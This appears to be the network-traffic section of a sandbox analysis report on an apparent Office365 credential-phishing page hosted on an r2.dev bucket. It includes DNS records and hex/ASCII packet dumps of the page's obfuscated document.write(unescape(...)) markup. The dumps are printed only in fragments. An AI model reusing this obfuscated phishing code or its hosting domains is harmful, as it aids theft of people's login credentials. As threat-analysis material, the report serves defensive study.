Apr 18, 2024 01:23:15.992307901 CEST	63324	53	192.168.2.4	1.1.1.1
Apr 18, 2024 01:23:16.096575975 CEST	53	60394	1.1.1.1	192.168.2.4
Apr 18, 2024 01:23:16.097820044 CEST	53	63324	1.1.1.1	192.168.2.4
Apr 18, 2024 01:23:30.513371944 CEST	53	60705	1.1.1.1	192.168.2.4
Apr 18, 2024 01:23:31.935621977 CEST	138	138	192.168.2.4	192.168.2.255
Apr 18, 2024 01:23:49.257138014 CEST	53	63152	1.1.1.1	192.168.2.4
Apr 18, 2024 01:24:11.677429914 CEST	53	55757	1.1.1.1	192.168.2.4
Apr 18, 2024 01:24:11.885023117 CEST	53	62099	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 18, 2024 01:23:14.041028976 CEST	192.168.2.4	1.1.1.1	0x7439	Standard query (0)	pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev	A (IP address)	IN (0x0001)	false
Apr 18, 2024 01:23:14.041353941 CEST	192.168.2.4	1.1.1.1	0xf905	Standard query (0)	pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev	65	IN (0x0001)	false
Apr 18, 2024 01:23:14.879818916 CEST	192.168.2.4	1.1.1.1	0x7d03	Standard query (0)	cdn-jm-tools.web.app	A (IP address)	IN (0x0001)	false
Apr 18, 2024 01:23:14.879920006 CEST	192.168.2.4	1.1.1.1	0xcfb	Standard query (0)	cdn-jm-tools.web.app	65	IN (0x0001)	false
Apr 18, 2024 01:23:14.880707026 CEST	192.168.2.4	1.1.1.1	0xec59	Standard query (0)	cdnjs.cloudflare.com	A (IP address)	IN (0x0001)	false
Apr 18, 2024 01:23:14.880829096 CEST	192.168.2.4	1.1.1.1	0x425f	Standard query (0)	cdnjs.cloudflare.com	65	IN (0x0001)	false
Apr 18, 2024 01:23:15.516769886 CEST	192.168.2.4	1.1.1.1	0xf50d	Standard query (0)	cdn-jm-tools.web.app	A (IP address)	IN (0x0001)	false
Apr 18, 2024 01:23:15.517522097 CEST	192.168.2.4	1.1.1.1	0x54	Standard query (0)	cdn-jm-tools.web.app	65	IN (0x0001)	false
Apr 18, 2024 01:23:15.991686106 CEST	192.168.2.4	1.1.1.1	0x3c74	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 18, 2024 01:23:15.992307901 CEST	192.168.2.4	1.1.1.1	0x3d05	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 18, 2024 01:23:14.151220083 CEST	1.1.1.1	192.168.2.4	0x7439	No error (0)	pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev		104.18.3.35	A (IP address)	IN (0x0001)	false
Apr 18, 2024 01:23:14.151220083 CEST	1.1.1.1	192.168.2.4	0x7439	No error (0)	pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev		104.18.2.35	A (IP address)	IN (0x0001)	false
Apr 18, 2024 01:23:14.985307932 CEST	1.1.1.1	192.168.2.4	0xec59	No error (0)	cdnjs.cloudflare.com		104.17.25.14	A (IP address)	IN (0x0001)	false
Apr 18, 2024 01:23:14.985307932 CEST	1.1.1.1	192.168.2.4	0xec59	No error (0)	cdnjs.cloudflare.com		104.17.24.14	A (IP address)	IN (0x0001)	false
Apr 18, 2024 01:23:14.985712051 CEST	1.1.1.1	192.168.2.4	0x425f	No error (0)	cdnjs.cloudflare.com			65	IN (0x0001)	false
Apr 18, 2024 01:23:15.010682106 CEST	1.1.1.1	192.168.2.4	0x7d03	No error (0)	cdn-jm-tools.web.app		199.36.158.100	A (IP address)	IN (0x0001)	false
Apr 18, 2024 01:23:15.646003008 CEST	1.1.1.1	192.168.2.4	0xf50d	No error (0)	cdn-jm-tools.web.app		199.36.158.100	A (IP address)	IN (0x0001)	false
Apr 18, 2024 01:23:15.868904114 CEST	1.1.1.1	192.168.2.4	0x841a	No error (0)	shed.dual-low.part-0012.t-0009.t-msedge.net	part-0012.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 18, 2024 01:23:15.868904114 CEST	1.1.1.1	192.168.2.4	0x841a	No error (0)	part-0012.t-0009.t-msedge.net		13.107.213.40	A (IP address)	IN (0x0001)	false
Apr 18, 2024 01:23:15.868904114 CEST	1.1.1.1	192.168.2.4	0x841a	No error (0)	part-0012.t-0009.t-msedge.net		13.107.246.40	A (IP address)	IN (0x0001)	false
Apr 18, 2024 01:23:16.096575975 CEST	1.1.1.1	192.168.2.4	0x3c74	No error (0)	www.google.com		142.250.105.99	A (IP address)	IN (0x0001)	false
Apr 18, 2024 01:23:16.096575975 CEST	1.1.1.1	192.168.2.4	0x3c74	No error (0)	www.google.com		142.250.105.105	A (IP address)	IN (0x0001)	false
Apr 18, 2024 01:23:16.096575975 CEST	1.1.1.1	192.168.2.4	0x3c74	No error (0)	www.google.com		142.250.105.103	A (IP address)	IN (0x0001)	false
Apr 18, 2024 01:23:16.096575975 CEST	1.1.1.1	192.168.2.4	0x3c74	No error (0)	www.google.com		142.250.105.104	A (IP address)	IN (0x0001)	false
Apr 18, 2024 01:23:16.096575975 CEST	1.1.1.1	192.168.2.4	0x3c74	No error (0)	www.google.com		142.250.105.106	A (IP address)	IN (0x0001)	false
Apr 18, 2024 01:23:16.096575975 CEST	1.1.1.1	192.168.2.4	0x3c74	No error (0)	www.google.com		142.250.105.147	A (IP address)	IN (0x0001)	false
Apr 18, 2024 01:23:16.097820044 CEST	1.1.1.1	192.168.2.4	0x3d05	No error (0)	www.google.com			65	IN (0x0001)	false
Apr 18, 2024 01:23:18.987258911 CEST	1.1.1.1	192.168.2.4	0x3027	No error (0)	shed.dual-low.part-0013.t-0009.t-msedge.net	part-0013.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 18, 2024 01:23:18.987258911 CEST	1.1.1.1	192.168.2.4	0x3027	No error (0)	part-0013.t-0009.t-msedge.net		13.107.213.41	A (IP address)	IN (0x0001)	false
Apr 18, 2024 01:23:18.987258911 CEST	1.1.1.1	192.168.2.4	0x3027	No error (0)	part-0013.t-0009.t-msedge.net		13.107.246.41	A (IP address)	IN (0x0001)	false
Apr 18, 2024 01:23:27.573512077 CEST	1.1.1.1	192.168.2.4	0x92f	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 18, 2024 01:23:27.573512077 CEST	1.1.1.1	192.168.2.4	0x92f	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 18, 2024 01:23:39.880337000 CEST	1.1.1.1	192.168.2.4	0xff0f	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 18, 2024 01:23:39.880337000 CEST	1.1.1.1	192.168.2.4	0xff0f	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev

https:

cdnjs.cloudflare.com

cdn-jm-tools.web.app

aadcdn.msauth.net

fs.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	104.18.3.35	443	5772	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-17 23:23:14 UTC	707	OUT	GET /updatemypassword.html HTTP/1.1 Host: pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-17 23:23:14 UTC	283	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 23:23:14 GMT Content-Type: text/html Content-Length: 58378 Connection: close Accept-Ranges: bytes ETag: "efae4a6c9f8dbefed2cb02604ee0b859" Last-Modified: Mon, 15 May 2023 12:49:53 GMT Server: cloudflare CF-RAY: 876029680e5a6734-ATL
2024-04-17 23:23:14 UTC	1369	IN	Data Raw: ef bb bf 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 20 75 6e 65 73 63 61 70 65 28 20 27 25 33 43 25 32 31 25 34 34 25 34 46 25 34 33 25 35 34 25 35 39 25 35 30 25 34 35 25 32 30 25 34 38 25 35 34 25 34 44 25 34 43 25 33 45 25 33 43 25 36 38 25 37 34 25 36 44 25 36 43 25 33 45 25 33 43 25 36 38 25 36 35 25 36 31 25 36 34 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 36 43 25 36 35 25 37 34 25 32 30 25 36 44 25 36 31 25 36 39 25 36 45 25 35 46 25 36 35 25 36 44 25 36 31 25 36 39 25 36 43 25 35 46 25 Data Ascii: <script language="javascript">document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%3E%3C%68%74%6D%6C%3E%3C%68%65%61%64%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%3E%0A%20%20%20%20%20%20%20%20%6C%65%74%20%6D%61%69%6E%5F%65%6D%61%69%6C%5F%
2024-04-17 23:23:14 UTC	1369	IN	Data Raw: 39 25 36 45 25 32 30 25 37 34 25 36 46 25 32 30 25 37 39 25 36 46 25 37 35 25 37 32 25 32 30 25 34 46 25 36 36 25 36 36 25 36 39 25 36 33 25 36 35 25 33 33 25 33 36 25 33 35 25 32 30 25 36 31 25 36 33 25 36 33 25 36 46 25 37 35 25 36 45 25 37 34 25 33 43 25 32 46 25 37 34 25 36 39 25 37 34 25 36 43 25 36 35 25 33 45 25 33 43 25 36 44 25 36 35 25 37 34 25 36 31 25 32 30 25 36 45 25 36 31 25 36 44 25 36 35 25 33 44 25 32 32 25 37 36 25 36 39 25 36 35 25 37 37 25 37 30 25 36 46 25 37 32 25 37 34 25 32 32 25 32 30 25 36 33 25 36 46 25 36 45 25 37 34 25 36 35 25 36 45 25 37 34 25 33 44 25 32 32 25 37 37 25 36 39 25 36 34 25 37 34 25 36 38 25 33 44 25 36 34 25 36 35 25 37 36 25 36 39 25 36 33 25 36 35 25 32 44 25 37 37 25 36 39 25 36 34 25 37 34 25 36 38 25 32 Data Ascii: 9%6E%20%74%6F%20%79%6F%75%72%20%4F%66%66%69%63%65%33%36%35%20%61%63%63%6F%75%6E%74%3C%2F%74%69%74%6C%65%3E%3C%6D%65%74%61%20%6E%61%6D%65%3D%22%76%69%65%77%70%6F%72%74%22%20%63%6F%6E%74%65%6E%74%3D%22%77%69%64%74%68%3D%64%65%76%69%63%65%2D%77%69%64%74%68%2
2024-04-17 23:23:14 UTC	1369	IN	Data Raw: 25 36 39 25 36 37 25 36 38 25 37 34 25 33 41 25 33 30 25 37 44 25 32 45 25 36 38 25 36 44 25 36 35 25 37 42 25 36 34 25 36 39 25 37 33 25 37 30 25 36 43 25 36 31 25 37 39 25 33 41 25 36 45 25 36 46 25 36 45 25 36 35 25 32 31 25 36 39 25 36 44 25 37 30 25 36 46 25 37 32 25 37 34 25 36 31 25 36 45 25 37 34 25 37 44 25 34 30 25 36 44 25 36 35 25 36 34 25 36 39 25 36 31 25 32 30 25 37 33 25 36 33 25 37 32 25 36 35 25 36 35 25 36 45 25 32 30 25 36 31 25 36 45 25 36 34 25 32 38 25 36 44 25 36 31 25 37 38 25 32 44 25 37 37 25 36 39 25 36 34 25 37 34 25 36 38 25 33 41 25 33 37 25 33 36 25 33 38 25 37 30 25 37 38 25 32 39 25 37 42 25 32 45 25 36 36 25 36 46 25 36 46 25 37 34 25 36 35 25 37 32 25 37 42 25 36 43 25 36 35 25 36 36 25 37 34 25 33 41 25 33 30 25 33 42 Data Ascii: %69%67%68%74%3A%30%7D%2E%68%6D%65%7B%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%21%69%6D%70%6F%72%74%61%6E%74%7D%40%6D%65%64%69%61%20%73%63%72%65%65%6E%20%61%6E%64%28%6D%61%78%2D%77%69%64%74%68%3A%37%36%38%70%78%29%7B%2E%66%6F%6F%74%65%72%7B%6C%65%66%74%3A%30%3B
2024-04-17 23:23:14 UTC	1369	IN	Data Raw: 36 33 25 37 33 25 37 33 25 33 41 25 32 30 25 37 42 25 32 30 25 36 31 25 37 30 25 37 30 25 33 41 25 32 30 25 36 39 25 37 33 25 34 31 25 37 30 25 37 30 25 34 32 25 37 32 25 36 31 25 36 45 25 36 34 25 36 39 25 36 45 25 36 37 25 32 30 25 37 44 25 32 43 25 32 30 25 37 33 25 37 34 25 37 39 25 36 43 25 36 35 25 33 41 25 32 30 25 37 42 25 32 30 25 36 32 25 36 31 25 36 33 25 36 42 25 36 37 25 37 32 25 36 46 25 37 35 25 36 45 25 36 34 25 33 41 25 32 30 25 36 32 25 36 31 25 36 33 25 36 42 25 36 37 25 37 32 25 36 46 25 37 35 25 36 45 25 36 34 25 35 33 25 37 34 25 37 39 25 36 43 25 36 35 25 32 30 25 37 44 25 32 32 25 33 45 25 33 43 25 36 34 25 36 39 25 37 36 25 32 30 25 36 34 25 36 31 25 37 34 25 36 31 25 32 44 25 36 32 25 36 39 25 36 45 25 36 34 25 33 44 25 32 32 25 Data Ascii: 63%73%73%3A%20%7B%20%61%70%70%3A%20%69%73%41%70%70%42%72%61%6E%64%69%6E%67%20%7D%2C%20%73%74%79%6C%65%3A%20%7B%20%62%61%63%6B%67%72%6F%75%6E%64%3A%20%62%61%63%6B%67%72%6F%75%6E%64%53%74%79%6C%65%20%7D%22%3E%3C%64%69%76%20%64%61%74%61%2D%62%69%6E%64%3D%22%
2024-04-17 23:23:14 UTC	1369	IN	Data Raw: 36 25 36 33 25 33 37 25 33 31 25 33 37 25 33 35 25 33 38 25 33 36 25 36 31 25 33 35 25 36 34 25 32 45 25 37 33 25 37 36 25 36 37 25 32 39 25 32 32 25 33 45 25 33 43 25 32 46 25 36 34 25 36 39 25 37 36 25 33 45 25 33 43 25 32 46 25 36 34 25 36 39 25 37 36 25 33 45 25 33 43 25 32 46 25 36 34 25 36 39 25 37 36 25 33 45 25 33 43 25 36 34 25 36 39 25 37 36 25 32 30 25 36 34 25 36 31 25 37 34 25 36 31 25 32 44 25 36 32 25 36 39 25 36 45 25 36 34 25 33 44 25 32 32 25 36 39 25 36 36 25 33 41 25 32 30 25 36 31 25 36 33 25 37 34 25 36 39 25 37 36 25 36 35 25 34 34 25 36 39 25 36 31 25 36 43 25 36 46 25 36 37 25 32 32 25 33 45 25 33 43 25 32 46 25 36 34 25 36 39 25 37 36 25 33 45 25 33 43 25 36 34 25 36 39 25 37 36 25 32 30 25 36 46 25 36 45 25 37 33 25 37 35 25 36 Data Ascii: 6%63%37%31%37%35%38%36%61%35%64%2E%73%76%67%29%22%3E%3C%2F%64%69%76%3E%3C%2F%64%69%76%3E%3C%2F%64%69%76%3E%3C%64%69%76%20%64%61%74%61%2D%62%69%6E%64%3D%22%69%66%3A%20%61%63%74%69%76%65%44%69%61%6C%6F%67%22%3E%3C%2F%64%69%76%3E%3C%64%69%76%20%6F%6E%73%75%6
2024-04-17 23:23:14 UTC	1369	IN	Data Raw: 25 37 32 25 34 34 25 36 31 25 37 34 25 36 31 25 33 41 25 32 30 25 37 33 25 37 36 25 37 32 25 32 43 25 32 30 25 37 33 25 36 38 25 36 46 25 37 37 25 34 32 25 37 35 25 37 34 25 37 34 25 36 46 25 36 45 25 37 33 25 33 41 25 32 30 25 37 33 25 37 36 25 37 32 25 32 45 25 36 36 25 32 43 25 32 30 25 37 33 25 36 38 25 36 46 25 37 37 25 34 36 25 36 46 25 36 46 25 37 34 25 36 35 25 37 32 25 34 43 25 36 39 25 36 45 25 36 42 25 37 33 25 33 41 25 32 30 25 37 34 25 37 32 25 37 35 25 36 35 25 32 43 25 32 30 25 37 35 25 37 33 25 36 35 25 35 37 25 36 39 25 37 41 25 36 31 25 37 32 25 36 34 25 34 32 25 36 35 25 36 38 25 36 31 25 37 36 25 36 39 25 36 46 25 37 32 25 33 41 25 32 30 25 37 33 25 37 36 25 37 32 25 32 45 25 34 32 25 34 33 25 32 43 25 32 30 25 36 38 25 36 31 25 36 45 Data Ascii: %72%44%61%74%61%3A%20%73%76%72%2C%20%73%68%6F%77%42%75%74%74%6F%6E%73%3A%20%73%76%72%2E%66%2C%20%73%68%6F%77%46%6F%6F%74%65%72%4C%69%6E%6B%73%3A%20%74%72%75%65%2C%20%75%73%65%57%69%7A%61%72%64%42%65%68%61%76%69%6F%72%3A%20%73%76%72%2E%42%43%2C%20%68%61%6E
2024-04-17 23:23:14 UTC	1369	IN	Data Raw: 36 37 25 36 46 25 35 35 25 37 32 25 36 43 25 32 43 25 32 30 25 32 37 25 37 37 25 36 39 25 36 34 25 36 35 25 32 37 25 33 41 25 32 30 25 37 30 25 36 31 25 36 37 25 36 39 25 36 45 25 36 31 25 37 34 25 36 39 25 36 46 25 36 45 25 34 33 25 36 46 25 36 45 25 37 34 25 37 32 25 36 46 25 36 43 25 34 44 25 36 35 25 37 34 25 36 38 25 36 46 25 36 34 25 37 33 25 32 38 25 32 39 25 32 30 25 32 36 25 36 31 25 36 44 25 37 30 25 33 42 25 32 36 25 36 31 25 36 44 25 37 30 25 33 42 25 32 30 25 37 30 25 36 31 25 36 37 25 36 39 25 36 45 25 36 31 25 37 34 25 36 39 25 36 46 25 36 45 25 34 33 25 36 46 25 36 45 25 37 34 25 37 32 25 36 46 25 36 43 25 34 44 25 36 35 25 37 34 25 36 38 25 36 46 25 36 34 25 37 33 25 32 38 25 32 39 25 32 45 25 36 33 25 37 35 25 37 32 25 37 32 25 36 35 25 Data Ascii: 67%6F%55%72%6C%2C%20%27%77%69%64%65%27%3A%20%70%61%67%69%6E%61%74%69%6F%6E%43%6F%6E%74%72%6F%6C%4D%65%74%68%6F%64%73%28%29%20%26%61%6D%70%3B%26%61%6D%70%3B%20%70%61%67%69%6E%61%74%69%6F%6E%43%6F%6E%74%72%6F%6C%4D%65%74%68%6F%64%73%28%29%2E%63%75%72%72%65%
2024-04-17 23:23:14 UTC	1369	IN	Data Raw: 46 25 36 45 25 36 35 25 36 45 25 37 34 25 33 41 25 32 30 25 37 42 25 32 30 25 36 45 25 36 31 25 36 44 25 36 35 25 33 41 25 32 30 25 32 37 25 36 43 25 36 46 25 36 37 25 36 46 25 32 44 25 36 33 25 36 46 25 36 45 25 37 34 25 37 32 25 36 46 25 36 43 25 32 37 25 32 43 25 32 30 25 37 30 25 36 31 25 37 32 25 36 31 25 36 44 25 37 33 25 33 41 25 32 30 25 37 42 25 32 30 25 36 39 25 37 33 25 34 33 25 36 38 25 36 39 25 36 45 25 36 31 25 34 34 25 36 33 25 33 41 25 32 30 25 37 33 25 37 36 25 37 32 25 32 45 25 36 36 25 34 39 25 37 33 25 34 33 25 36 38 25 36 39 25 36 45 25 36 31 25 34 34 25 36 33 25 32 43 25 32 30 25 36 32 25 36 31 25 36 45 25 36 45 25 36 35 25 37 32 25 34 43 25 36 46 25 36 37 25 36 46 25 35 35 25 37 32 25 36 43 25 33 41 25 32 30 25 36 32 25 36 31 25 36 Data Ascii: F%6E%65%6E%74%3A%20%7B%20%6E%61%6D%65%3A%20%27%6C%6F%67%6F%2D%63%6F%6E%74%72%6F%6C%27%2C%20%70%61%72%61%6D%73%3A%20%7B%20%69%73%43%68%69%6E%61%44%63%3A%20%73%76%72%2E%66%49%73%43%68%69%6E%61%44%63%2C%20%62%61%6E%6E%65%72%4C%6F%67%6F%55%72%6C%3A%20%62%61%6
2024-04-17 23:23:14 UTC	1369	IN	Data Raw: 25 37 37 25 36 35 25 36 32 25 32 45 25 36 31 25 37 30 25 37 30 25 32 46 25 36 34 25 32 45 25 32 45 25 37 30 25 32 46 25 36 46 25 37 34 25 36 38 25 36 35 25 37 32 25 37 33 25 32 46 25 36 44 25 36 39 25 32 45 25 32 45 25 36 33 25 37 32 25 36 46 25 32 44 25 32 44 25 32 44 25 37 34 25 32 46 25 36 44 25 36 39 25 36 33 25 37 32 25 36 46 25 37 33 25 36 46 25 36 36 25 37 34 25 35 46 25 36 43 25 36 46 25 36 37 25 36 46 25 35 46 25 36 35 25 36 35 25 33 35 25 36 33 25 33 38 25 36 34 25 33 39 25 36 36 25 36 32 25 33 36 25 33 32 25 33 34 25 33 38 25 36 33 25 33 39 25 33 33 25 33 38 25 36 36 25 36 34 25 33 30 25 36 34 25 36 33 25 33 31 25 33 39 25 33 33 25 33 37 25 33 30 25 36 35 25 33 39 25 33 30 25 36 32 25 36 34 25 32 45 25 37 33 25 37 36 25 36 37 25 32 32 25 32 30 Data Ascii: %77%65%62%2E%61%70%70%2F%64%2E%2E%70%2F%6F%74%68%65%72%73%2F%6D%69%2E%2E%63%72%6F%2D%2D%2D%74%2F%6D%69%63%72%6F%73%6F%66%74%5F%6C%6F%67%6F%5F%65%65%35%63%38%64%39%66%62%36%32%34%38%63%39%33%38%66%64%30%64%63%31%39%33%37%30%65%39%30%62%64%2E%73%76%67%22%20
2024-04-17 23:23:14 UTC	1369	IN	Data Raw: 37 42 25 32 30 25 36 33 25 36 31 25 36 45 25 36 33 25 36 35 25 36 43 25 33 41 25 32 30 25 37 30 25 36 31 25 36 37 25 36 39 25 36 45 25 36 31 25 37 34 25 36 39 25 36 46 25 36 45 25 34 33 25 36 46 25 36 45 25 37 34 25 37 32 25 36 46 25 36 43 25 35 46 25 36 46 25 36 45 25 34 33 25 36 31 25 36 45 25 36 33 25 36 35 25 36 43 25 32 43 25 32 30 25 36 43 25 36 46 25 36 31 25 36 34 25 35 36 25 36 39 25 36 35 25 37 37 25 33 41 25 32 30 25 37 36 25 36 39 25 36 35 25 37 37 25 35 46 25 36 46 25 36 45 25 34 43 25 36 46 25 36 31 25 36 34 25 35 36 25 36 39 25 36 35 25 37 37 25 32 43 25 32 30 25 37 33 25 36 38 25 36 46 25 37 37 25 35 36 25 36 39 25 36 35 25 37 37 25 33 41 25 32 30 25 37 36 25 36 39 25 36 35 25 37 37 25 35 46 25 36 46 25 36 45 25 35 33 25 36 38 25 36 46 25 Data Ascii: 7B%20%63%61%6E%63%65%6C%3A%20%70%61%67%69%6E%61%74%69%6F%6E%43%6F%6E%74%72%6F%6C%5F%6F%6E%43%61%6E%63%65%6C%2C%20%6C%6F%61%64%56%69%65%77%3A%20%76%69%65%77%5F%6F%6E%4C%6F%61%64%56%69%65%77%2C%20%73%68%6F%77%56%69%65%77%3A%20%76%69%65%77%5F%6F%6E%53%68%6F%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	104.17.25.14	443	5772	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-17 23:23:15 UTC	729	OUT	GET /ajax/libs/jquery/3.5.0/jquery.min.js HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-17 23:23:15 UTC	961	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 23:23:15 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: W/"5eb03ec4-15d95" Last-Modified: Mon, 04 May 2020 16:11:48 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff CF-Cache-Status: HIT Age: 155745 Expires: Mon, 07 Apr 2025 23:23:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c7kmRhcihGS7f%2BE%2B3H%2BEmxHpJrzle0qlHqWfqWRKejmJYq%2BO1uyWUj8Ix8HOtnKDkbXVG20M0Gh0rwuAQC5wIzmDMID8Aoz49k4vSFvLR5rUhnlswGg8EGQ7FkcXdt8vMskVemQ7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 8760296d38317b9c-ATL alt-svc: h3=":443"; ma=86400
2024-04-17 23:23:15 UTC	408	IN	Data Raw: 37 62 65 64 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 35 2e 30 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a Data Ascii: 7bed/! jQuery v3.5.0 \| (c) JS Foundation and other contributors \| jquery.org/license /!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("j
2024-04-17 23:23:15 UTC	1369	IN	Data Raw: 74 79 70 65 4f 66 2c 73 3d 74 2e 73 6c 69 63 65 2c 67 3d 74 2e 66 6c 61 74 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 66 6c 61 74 2e 63 61 6c 6c 28 65 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 63 6f 6e 63 61 74 2e 61 70 70 6c 79 28 5b 5d 2c 65 29 7d 2c 75 3d 74 2e 70 75 73 68 2c 69 3d 74 2e 69 6e 64 65 78 4f 66 2c 6e 3d 7b 7d 2c 6f 3d 6e 2e 74 6f 53 74 72 69 6e 67 2c 76 3d 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 61 3d 76 2e 74 6f 53 74 72 69 6e 67 2c 6c 3d 61 2e 63 61 6c 6c 28 4f 62 6a 65 63 74 29 2c 79 3d 7b 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 21 3d 74 79 70 65 6f 66 20 65 Data Ascii: typeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e
